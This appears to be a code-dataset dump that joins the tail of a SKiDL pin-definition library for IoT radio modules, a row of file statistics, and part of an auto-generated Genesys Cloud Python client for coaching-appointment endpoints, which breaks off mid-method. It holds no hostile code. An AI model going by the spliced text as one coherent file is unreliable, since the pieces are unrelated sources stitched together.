Pin(num='44',name='GPIO5/KBR0',func=Pin.BIDIR,do_erc=True),
Pin(num='54',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='64',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='15',name='VDD_EXT',func=Pin.PWRIN,do_erc=True),
Pin(num='25',name='ADC',func=Pin.PASSIVE,do_erc=True),
Pin(num='35',name='PWM1',func=Pin.OUTPUT,do_erc=True),
Pin(num='45',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='55',name='VBAT',func=Pin.PWRIN,do_erc=True),
Pin(num='65',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='16',name='~RESET~',do_erc=True),
Pin(num='26',name='VRTC',func=Pin.PASSIVE,do_erc=True),
Pin(num='36',name='PWM2',func=Pin.OUTPUT,do_erc=True),
Pin(num='46',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='56',name='VBAT',func=Pin.PWRIN,do_erc=True),
Pin(num='66',name='STATUS',func=Pin.PASSIVE,do_erc=True),
Pin(num='17',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='27',name='DBG_TXD',func=Pin.OUTPUT,do_erc=True),
Pin(num='37',name='SDA',func=Pin.BIDIR,do_erc=True),
Pin(num='47',name='GPIO6/KBC4',func=Pin.BIDIR,do_erc=True),
Pin(num='57',name='VBAT',func=Pin.PWRIN,do_erc=True),
Pin(num='67',name='GPIO11',func=Pin.BIDIR,do_erc=True),
Pin(num='18',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='28',name='DBG_RXD',do_erc=True),
Pin(num='38',name='SCL',func=Pin.OUTPUT,do_erc=True),
Pin(num='48',name='GPIO7/KBC3',func=Pin.BIDIR,do_erc=True),
Pin(num='58',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='68',name='GPIO12',func=Pin.BIDIR,do_erc=True),
Pin(num='19',name='MIC_P',func=Pin.PASSIVE,do_erc=True),
Pin(num='29',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='39',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='49',name='GPIO8/KBC2',func=Pin.BIDIR,do_erc=True),
Pin(num='59',name='GND',func=Pin.PWRIN,do_erc=True)]),
Part(name='TD1205',dest=TEMPLATE,tool=SKIDL,keywords='IOT SIGFOX GPS',description='High-Performance, Low-Current SIGFOX™ Gateway And GPS Receiver With Integrated Antennas',ref_prefix='U',num_units=1,do_erc=True,pins=[
Pin(num='1',name='BAT-',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='BAT+',func=Pin.PWRIN,do_erc=True),
Pin(num='3',name='VDD',func=Pin.PWRIN,do_erc=True),
Pin(num='4',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='5',name='~RST',do_erc=True),
Pin(num='6',name='UART-TX',func=Pin.BIDIR,do_erc=True),
Pin(num='7',name='UART-RX',func=Pin.BIDIR,do_erc=True),
Pin(num='8',name='DB2-SWDIO',func=Pin.BIDIR,do_erc=True),
Pin(num='9',name='DB3-SWCLK',func=Pin.BIDIR,do_erc=True)]),
Part(name='TD1208',dest=TEMPLATE,tool=SKIDL,keywords='IOT SIGFOX',description='High-Performance, Low-Current SIGFOX™ Gateway',ref_prefix='U',num_units=1,do_erc=True,pins=[
Pin(num='1',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='3',name='Reserved',func=Pin.UNSPEC,do_erc=True),
Pin(num='4',name='USR4',func=Pin.BIDIR,do_erc=True),
Pin(num='5',name='DB3-SWCLK',func=Pin.BIDIR,do_erc=True),
Pin(num='6',name='DB2-SWDIO',func=Pin.BIDIR,do_erc=True),
Pin(num='7',name='SDA',func=Pin.BIDIR,do_erc=True),
Pin(num='8',name='SCL',func=Pin.BIDIR,do_erc=True),
Pin(num='9',name='VDD',func=Pin.PWRIN,do_erc=True),
Pin(num='10',name='USR2',func=Pin.BIDIR,do_erc=True),
Pin(num='20',name='ADC0',func=Pin.BIDIR,do_erc=True),
Pin(num='11',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='21',name='TIM2',func=Pin.BIDIR,do_erc=True),
Pin(num='12',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='22',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='13',name='USR3',func=Pin.BIDIR,do_erc=True),
Pin(num='23',name='RF_GND',func=Pin.PWRIN,do_erc=True),
Pin(num='14',name='~RST',do_erc=True),
Pin(num='24',name='RF',func=Pin.BIDIR,do_erc=True),
Pin(num='15',name='DAC0',func=Pin.BIDIR,do_erc=True),
Pin(num='25',name='RF_GND',func=Pin.PWRIN,do_erc=True),
Pin(num='16',name='USR0',func=Pin.BIDIR,do_erc=True),
Pin(num='17',name='USR1',func=Pin.BIDIR,do_erc=True),
Pin(num='18',name='UART-TX',func=Pin.BIDIR,do_erc=True),
Pin(num='19',name='UART-RX',func=Pin.BIDIR,do_erc=True)]),
Part(name='TR-52D',dest=TEMPLATE,tool=SKIDL,keywords='IQRF common transceiver, GMSK modulation',description='IQRF common transceiver, GMSK modulation',ref_prefix='IC',num_units=1,fplist=['IQRF?KON?SIM?01*'],do_erc=True,aliases=['TR-72D', 'DCTR-52D', 'DCTR-72D'],pins=[
Pin(num='1',name='RA0/AN0/C12IN0',func=Pin.BIDIR,do_erc=True),
Pin(num='2',name='RC2/Vout',func=Pin.BIDIR,do_erc=True),
Pin(num='3',name='Vin',func=Pin.PWRIN,do_erc=True),
Pin(num='4',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='5',name='RA5/RB4/RC6/AN4/AN11/TX/~SS~/C2OUT/CCP3',func=Pin.BIDIR,do_erc=True),
Pin(num='6',name='RC3/SCK/SCL',func=Pin.BIDIR,do_erc=True),
Pin(num='7',name='RC4/SDI/SDA',func=Pin.BIDIR,do_erc=True),
Pin(num='8',name='RC5/RC7/RX/SDO',func=Pin.BIDIR,do_erc=True),
Pin(num='9',name='GND',func=Pin.PWRIN,do_erc=True)]),
Part(name='XBee_SMT',dest=TEMPLATE,tool=SKIDL,keywords='Digi XBee',description='Digi Xbee SMT RF module',ref_prefix='U',num_units=1,fplist=['Digi*XBee*SMT*'],do_erc=True,pins=[
Pin(num='1',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='3',name='DIO13/UART_TX',func=Pin.BIDIR,do_erc=True),
Pin(num='4',name='DIO14/UART_RX/~CONFIG',func=Pin.BIDIR,do_erc=True),
Pin(num='5',name='DIO12',func=Pin.BIDIR,do_erc=True),
Pin(num='6',name='RESET/OD_OUT',func=Pin.BIDIR,do_erc=True),
Pin(num='7',name='DIO10/RSSI/PWM0',func=Pin.BIDIR,do_erc=True),
Pin(num='8',name='DIO11/PWM1',func=Pin.BIDIR,do_erc=True),
Pin(num='9',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='10',name='DIO8/SLEEP_REQUEST',func=Pin.BIDIR,do_erc=True),
Pin(num='20',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='30',name='DIO3/AD3',func=Pin.BIDIR,do_erc=True),
Pin(num='11',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='21',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='31',name='DIO2/AD2',func=Pin.BIDIR,do_erc=True),
Pin(num='12',name='DIO19/SPI_~ATTN',func=Pin.OUTPUT,do_erc=True),
Pin(num='22',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='32',name='DIO1/AD1',func=Pin.BIDIR,do_erc=True),
Pin(num='13',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='23',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='33',name='DIO0/AD0',func=Pin.BIDIR,do_erc=True),
Pin(num='14',name='DIO18/SPI_CLK',do_erc=True),
Pin(num='24',name='DIO4',func=Pin.BIDIR,do_erc=True),
Pin(num='34',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='15',name='DIO17/SPI_~SSEL',do_erc=True),
Pin(num='25',name='DIO7/~CTS',func=Pin.BIDIR,do_erc=True),
Pin(num='35',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='16',name='DIO16/SPI_MOSI',do_erc=True),
Pin(num='26',name='DIO9/ON/~SLEEP',func=Pin.BIDIR,do_erc=True),
Pin(num='36',name='RF',func=Pin.BIDIR,do_erc=True),
Pin(num='17',name='DIO15/SPI_MISO',func=Pin.OUTPUT,do_erc=True),
Pin(num='27',name='VREF',func=Pin.PWRIN,do_erc=True),
Pin(num='37',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='18',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='28',name='DIO5/ASSOCIATE',func=Pin.BIDIR,do_erc=True),
Pin(num='19',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='29',name='DIO6/~RTS',func=Pin.BIDIR,do_erc=True)]),
Part(name='iM880A',dest=TEMPLATE,tool=SKIDL,keywords='IOT LoRa',description='IMST Long Range Radio Module - LoRa Alliance Certified',ref_prefix='U',num_units=1,do_erc=True,aliases=['iM880B'],pins=[
Pin(num='1',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='P1-IO/JTCK/SWCLK',func=Pin.BIDIR,do_erc=True),
Pin(num='3',name='P2-IO/JTMS/SWDIO',func=Pin.BIDIR,do_erc=True),
Pin(num='4',name='P3-IO/JTDO',func=Pin.BIDIR,do_erc=True),
Pin(num='5',name='P4-IO/JTDI',func=Pin.BIDIR,do_erc=True),
Pin(num='6',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='7',name='~RST',do_erc=True),
Pin(num='8',name='P5-IO/UART-CTS',func=Pin.BIDIR,do_erc=True),
Pin(num='9',name='P6-IO/UART-RTS',func=Pin.BIDIR,do_erc=True),
Pin(num='10',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='20',name='P11-IO',func=Pin.BIDIR,do_erc=True),
Pin(num='30',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='11',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='21',name='P12-IO/I2C-SCL',func=Pin.BIDIR,do_erc=True),
Pin(num='31',name='RF',func=Pin.BIDIR,do_erc=True),
Pin(num='12',name='P7-IO/SPI-MISO',func=Pin.BIDIR,do_erc=True),
Pin(num='22',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='32',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='13',name='P8-IO/SPI-MOSI',func=Pin.BIDIR,do_erc=True),
Pin(num='23',name='P13-IO/I2C-SDA',func=Pin.BIDIR,do_erc=True),
Pin(num='14',name='P9-IO/SPI-CLK',func=Pin.BIDIR,do_erc=True),
Pin(num='24',name='P14-IO/ADC',func=Pin.BIDIR,do_erc=True),
Pin(num='15',name='P10-IO/SPI-NSS',func=Pin.BIDIR,do_erc=True),
Pin(num='25',name='P15-IO/WKUP',func=Pin.BIDIR,do_erc=True),
Pin(num='16',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='26',name='BOOT',do_erc=True),
Pin(num='17',name='VDD',func=Pin.PWRIN,do_erc=True),
Pin(num='27',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='18',name='RxD-IO/UART-RX',func=Pin.BIDIR,do_erc=True),
Pin(num='28',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='19',name='TxD-IO/UART-TX',func=Pin.BIDIR,do_erc=True),
Pin(num='29',name='P17-IO/ADC',func=Pin.BIDIR,do_erc=True)])])
| 70.600362 | 276 | 0.594078 | 6,578 | 39,042 | 3.410763 | 0.079203 | 0.121902 | 0.219424 | 0.272776 | 0.888394 | 0.87734 | 0.870342 | 0.807943 | 0.732261 | 0.711847 | 0 | 0.043646 | 0.184289 | 39,042 | 552 | 277 | 70.728261 | 0.660722 | 0 | 0 | 0.192727 | 0 | 0 | 0.149198 | 0.007223 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.092727 | 0.001818 | 0 | 0.001818 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 9 |
6a880762681e5de243ece8cc4175a572d9393391 | 66,842 | py | Python | libs/PureCloudPlatformClientV2/apis/coaching_api.py | rocketbot-cl/genesysCloud | dd9d9b5ebb90a82bab98c0d88b9585c22c91f333 | [
"MIT"
] | 1 | 2021-10-08T20:46:45.000Z | 2021-10-08T20:46:45.000Z | libs/PureCloudPlatformClientV2/apis/coaching_api.py | rocketbot-cl/genesysCloud | dd9d9b5ebb90a82bab98c0d88b9585c22c91f333 | [
"MIT"
] | null | null | null | libs/PureCloudPlatformClientV2/apis/coaching_api.py | rocketbot-cl/genesysCloud | dd9d9b5ebb90a82bab98c0d88b9585c22c91f333 | [
"MIT"
] | null | null | null | # coding: utf-8
"""
CoachingApi.py
Copyright 2016 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class CoachingApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def delete_coaching_appointment(self, appointment_id, **kwargs):
"""
Delete an existing appointment
Permission not required if you are the creator of the appointment
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_coaching_appointment(appointment_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str appointment_id: The ID of the coaching appointment. (required)
:return: CoachingAppointmentReference
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['appointment_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_coaching_appointment" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'appointment_id' is set
if ('appointment_id' not in params) or (params['appointment_id'] is None):
raise ValueError("Missing the required parameter `appointment_id` when calling `delete_coaching_appointment`")
resource_path = '/api/v2/coaching/appointments/{appointmentId}'.replace('{format}', 'json')
path_params = {}
if 'appointment_id' in params:
path_params['appointmentId'] = params['appointment_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CoachingAppointmentReference',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def delete_coaching_appointment_annotation(self, appointment_id, annotation_id, **kwargs):
"""
Delete an existing annotation
You must have the appropriate permission for the type of annotation you are updating. Permission not required if you are the creator or facilitator of the appointment
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_coaching_appointment_annotation(appointment_id, annotation_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str appointment_id: The ID of the coaching appointment. (required)
:param str annotation_id: The ID of the annotation. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['appointment_id', 'annotation_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_coaching_appointment_annotation" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'appointment_id' is set
if ('appointment_id' not in params) or (params['appointment_id'] is None):
raise ValueError("Missing the required parameter `appointment_id` when calling `delete_coaching_appointment_annotation`")
# verify the required parameter 'annotation_id' is set
if ('annotation_id' not in params) or (params['annotation_id'] is None):
raise ValueError("Missing the required parameter `annotation_id` when calling `delete_coaching_appointment_annotation`")
resource_path = '/api/v2/coaching/appointments/{appointmentId}/annotations/{annotationId}'.replace('{format}', 'json')
path_params = {}
if 'appointment_id' in params:
path_params['appointmentId'] = params['appointment_id']
if 'annotation_id' in params:
path_params['annotationId'] = params['annotation_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_coaching_appointment(self, appointment_id, **kwargs):
"""
Retrieve an appointment
Permission not required if you are the attendee, creator or facilitator of the appointment
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_coaching_appointment(appointment_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str appointment_id: The ID of the coaching appointment. (required)
:return: CoachingAppointmentResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['appointment_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_coaching_appointment" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'appointment_id' is set
if ('appointment_id' not in params) or (params['appointment_id'] is None):
raise ValueError("Missing the required parameter `appointment_id` when calling `get_coaching_appointment`")
resource_path = '/api/v2/coaching/appointments/{appointmentId}'.replace('{format}', 'json')
path_params = {}
if 'appointment_id' in params:
path_params['appointmentId'] = params['appointment_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CoachingAppointmentResponse',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_coaching_appointment_annotation(self, appointment_id, annotation_id, **kwargs):
"""
Retrieve an annotation.
You must have the appropriate permission for the type of annotation you are creating. Permission not required if you are related to the appointment (only the creator or facilitator can view private annotations).
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_coaching_appointment_annotation(appointment_id, annotation_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str appointment_id: The ID of the coaching appointment. (required)
:param str annotation_id: The ID of the annotation. (required)
:return: CoachingAnnotation
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['appointment_id', 'annotation_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_coaching_appointment_annotation" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'appointment_id' is set
if ('appointment_id' not in params) or (params['appointment_id'] is None):
raise ValueError("Missing the required parameter `appointment_id` when calling `get_coaching_appointment_annotation`")
# verify the required parameter 'annotation_id' is set
if ('annotation_id' not in params) or (params['annotation_id'] is None):
raise ValueError("Missing the required parameter `annotation_id` when calling `get_coaching_appointment_annotation`")
resource_path = '/api/v2/coaching/appointments/{appointmentId}/annotations/{annotationId}'.replace('{format}', 'json')
path_params = {}
if 'appointment_id' in params:
path_params['appointmentId'] = params['appointment_id']
if 'annotation_id' in params:
path_params['annotationId'] = params['annotation_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CoachingAnnotation',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_coaching_appointment_annotations(self, appointment_id, **kwargs):
"""
Get a list of annotations.
You must have the appropriate permission for the type of annotation you are creating. Permission not required if you are related to the appointment (only the creator or facilitator can view private annotations).
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_coaching_appointment_annotations(appointment_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str appointment_id: The ID of the coaching appointment. (required)
:param int page_number: Page number
:param int page_size: Page size
:return: CoachingAnnotationList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['appointment_id', 'page_number', 'page_size']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_coaching_appointment_annotations" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'appointment_id' is set
if ('appointment_id' not in params) or (params['appointment_id'] is None):
raise ValueError("Missing the required parameter `appointment_id` when calling `get_coaching_appointment_annotations`")
resource_path = '/api/v2/coaching/appointments/{appointmentId}/annotations'.replace('{format}', 'json')
path_params = {}
if 'appointment_id' in params:
path_params['appointmentId'] = params['appointment_id']
query_params = {}
if 'page_number' in params:
query_params['pageNumber'] = params['page_number']
if 'page_size' in params:
query_params['pageSize'] = params['page_size']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CoachingAnnotationList',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_coaching_appointment_statuses(self, appointment_id, **kwargs):
"""
Get the list of status changes for a coaching appointment.
Permission not required if you are an attendee, creator or facilitator of the appointment
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_coaching_appointment_statuses(appointment_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str appointment_id: The ID of the coaching appointment. (required)
:param int page_number: Page number
:param int page_size: Page size
:return: CoachingAppointmentStatusResponseList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['appointment_id', 'page_number', 'page_size']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_coaching_appointment_statuses" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'appointment_id' is set
if ('appointment_id' not in params) or (params['appointment_id'] is None):
raise ValueError("Missing the required parameter `appointment_id` when calling `get_coaching_appointment_statuses`")
resource_path = '/api/v2/coaching/appointments/{appointmentId}/statuses'.replace('{format}', 'json')
path_params = {}
if 'appointment_id' in params:
path_params['appointmentId'] = params['appointment_id']
query_params = {}
if 'page_number' in params:
query_params['pageNumber'] = params['page_number']
if 'page_size' in params:
query_params['pageSize'] = params['page_size']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CoachingAppointmentStatusResponseList',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_coaching_appointments(self, user_ids, **kwargs):
"""
Get appointments for users and optional date range
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_coaching_appointments(user_ids, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] user_ids: The user IDs for which to retrieve appointments (required)
:param str interval: Interval to filter data by. End date is not inclusive. Intervals are represented as an ISO-8601 string. For example: YYYY-MM-DDThh:mm:ss/YYYY-MM-DDThh:mm:ss
:param int page_number: Page number
:param int page_size: Page size
:param list[str] statuses: Appointment Statuses to filter by
:param list[str] facilitator_ids: The facilitator IDs for which to retrieve appointments
:param str sort_order: Sort (by due date) either Asc or Desc
:param list[str] relationships: Relationships to filter by
:param str completion_interval: Appointment completion start and end to filter by. End date is not inclusive. Intervals are represented as an ISO-8601 string. For example: YYYY-MM-DDThh:mm:ss/YYYY-MM-DDThh:mm:ss
:param str overdue: Overdue status to filter by
:return: CoachingAppointmentResponseList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['user_ids', 'interval', 'page_number', 'page_size', 'statuses', 'facilitator_ids', 'sort_order', 'relationships', 'completion_interval', 'overdue']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_coaching_appointments" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'user_ids' is set
if ('user_ids' not in params) or (params['user_ids'] is None):
raise ValueError("Missing the required parameter `user_ids` when calling `get_coaching_appointments`")
resource_path = '/api/v2/coaching/appointments'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'user_ids' in params:
query_params['userIds'] = params['user_ids']
if 'interval' in params:
query_params['interval'] = params['interval']
if 'page_number' in params:
query_params['pageNumber'] = params['page_number']
if 'page_size' in params:
query_params['pageSize'] = params['page_size']
if 'statuses' in params:
query_params['statuses'] = params['statuses']
if 'facilitator_ids' in params:
query_params['facilitatorIds'] = params['facilitator_ids']
if 'sort_order' in params:
query_params['sortOrder'] = params['sort_order']
if 'relationships' in params:
query_params['relationships'] = params['relationships']
if 'completion_interval' in params:
query_params['completionInterval'] = params['completion_interval']
if 'overdue' in params:
query_params['overdue'] = params['overdue']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CoachingAppointmentResponseList',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_coaching_appointments_me(self, **kwargs):
"""
Get my appointments for a given date range
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_coaching_appointments_me(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str interval: Interval to filter data by. End date is not inclusive. Intervals are represented as an ISO-8601 string. For example: YYYY-MM-DDThh:mm:ss/YYYY-MM-DDThh:mm:ss
:param int page_number: Page number
:param int page_size: Page size
:param list[str] statuses: Appointment Statuses to filter by
:param list[str] facilitator_ids: The facilitator IDs for which to retrieve appointments
:param str sort_order: Sort (by due date) either Asc or Desc
:param list[str] relationships: Relationships to filter by
:param str completion_interval: Appointment completion start and end to filter by. End date is not inclusive. Intervals are represented as an ISO-8601 string. For example: YYYY-MM-DDThh:mm:ss/YYYY-MM-DDThh:mm:ss
:param str overdue: Overdue status to filter by
:return: CoachingAppointmentResponseList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['interval', 'page_number', 'page_size', 'statuses', 'facilitator_ids', 'sort_order', 'relationships', 'completion_interval', 'overdue']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_coaching_appointments_me" % key
)
params[key] = val
del params['kwargs']
resource_path = '/api/v2/coaching/appointments/me'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'interval' in params:
query_params['interval'] = params['interval']
if 'page_number' in params:
